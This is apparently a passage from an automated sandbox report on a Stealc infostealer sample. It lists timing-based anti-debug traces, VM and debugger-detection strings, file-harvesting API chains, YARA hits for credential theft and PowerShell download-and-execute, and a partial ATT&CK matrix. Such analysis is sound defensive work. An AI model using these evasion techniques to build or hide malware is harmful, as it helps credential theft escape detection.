                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACA34 second address: DACA39 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACA39 second address: DACA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAF53D second address: DAF556 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAF556 second address: DAF56D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1675279DB1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAEF5C second address: DAEF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E22h 0x00000009 popad 0x0000000a jmp 00007F1674F90E26h 0x0000000f jmp 00007F1674F90E20h 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB15A6 second address: DB15AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB15AC second address: DB15B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB118E second address: DB11AE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1675279DB9h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB8388 second address: DB83A4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F1674F90E21h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBA6BE second address: DBA6C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF0CC second address: DBF0D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBEF89 second address: DBEFAA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1675279DA6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edx 0x0000000e jmp 00007F1675279DB0h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBEFAA second address: DBEFB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC38CB second address: DC38CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC38CF second address: DC38D5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA632 second address: DCA637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA637 second address: DCA644 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jg 00007F1674F90E16h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA8F7 second address: DCA913 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1675279DA6h 0x00000008 jmp 00007F1675279DAFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA913 second address: DCA93C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F1674F90E1Dh 0x0000000a pushad 0x0000000b jmp 00007F1674F90E24h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA93C second address: DCA942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA942 second address: DCA94E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push esi 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCAAD0 second address: DCAAD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCAAD4 second address: DCAB18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1674F90E28h 0x0000000e pop edi 0x0000000f push ebx 0x00000010 jne 00007F1674F90E18h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCAB18 second address: DCAB1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCAE0A second address: DCAE1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCAF8F second address: DCAF95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCE4A9 second address: DCE4BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push edi 0x00000008 push edx 0x00000009 pop edx 0x0000000a jg 00007F1674F90E16h 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD87A3 second address: DD87D8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F1675279DB6h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1675279DB7h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE8BE6 second address: DE8BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F1674F90E16h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE8BF3 second address: DE8BF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE8BF9 second address: DE8BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE8A74 second address: DE8A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEAD6C second address: DEAD72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEAD72 second address: DEAD78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEAD78 second address: DEAD7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA566 second address: DFA56E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA56E second address: DFA5B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F1674F90E1Eh 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jl 00007F1674F90E16h 0x00000014 jo 00007F1674F90E16h 0x0000001a jmp 00007F1674F90E27h 0x0000001f popad 0x00000020 popad 0x00000021 push esi 0x00000022 pushad 0x00000023 js 00007F1674F90E16h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA97D second address: DFA981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA981 second address: DFA98A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA98A second address: DFA991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFADB8 second address: DFADCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F1674F90E1Fh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFB397 second address: DFB39B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFCD5B second address: DFCD69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1674F90E1Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFCD69 second address: DFCD6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFCD6D second address: DFCD8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1674F90E21h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFCD8A second address: DFCD8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFCD8E second address: DFCD92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFE494 second address: DFE4A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E00D72 second address: E00D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1674F90E22h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E00F1A second address: E00F2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1675279DAFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E01038 second address: E01042 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1674F90E1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02AEE second address: E02B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1675279DA6h 0x0000000a popad 0x0000000b pushad 0x0000000c jnp 00007F1675279DA6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007F1675279DB2h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02B15 second address: E02B1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02B1D second address: E02B37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F1675279DAEh 0x0000000c push esi 0x0000000d pop esi 0x0000000e jng 00007F1675279DA6h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E4033C second address: 4E4036B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F1674F90E1Ch 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F1674F90E20h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ax, dx 0x00000019 mov cx, di 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E4036B second address: 4E40380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1675279DB1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E4042B second address: 4E4045E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push ecx 0x0000000d mov di, A7CEh 0x00000011 pop edx 0x00000012 mov esi, 18B7830Bh 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E4045E second address: 4E40464 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E40464 second address: 4E40479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1674F90E21h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E40479 second address: 4E4047D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B719FA instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D13958 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D26394 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DA3622 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009238B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_009238B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00924910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00924910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0091DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0091E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0091ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00924570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00924570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0091F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00923EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00923EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009116D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0091DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0091BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00911160 GetSystemInfo,ExitProcess,0_2_00911160
                Source: file.exe, file.exe, 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1747007538.000000000102E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1747007538.00000000010A4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747007538.0000000001072000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13638
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13587
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13584
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13605
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13598
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009145C0 VirtualProtect ?,00000004,00000100,000000000_2_009145C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00929860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00929860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00929750 mov eax, dword ptr fs:[00000030h]0_2_00929750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009278E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_009278E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7264, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00929600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00929600
                Source: file.exe, file.exe, 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: TProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00927B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00927980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00927980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00927850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00927850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00927A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00927A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.910000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1704892194.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1747007538.000000000102E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7264, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.910000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1704892194.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1747007538.000000000102E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7264, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
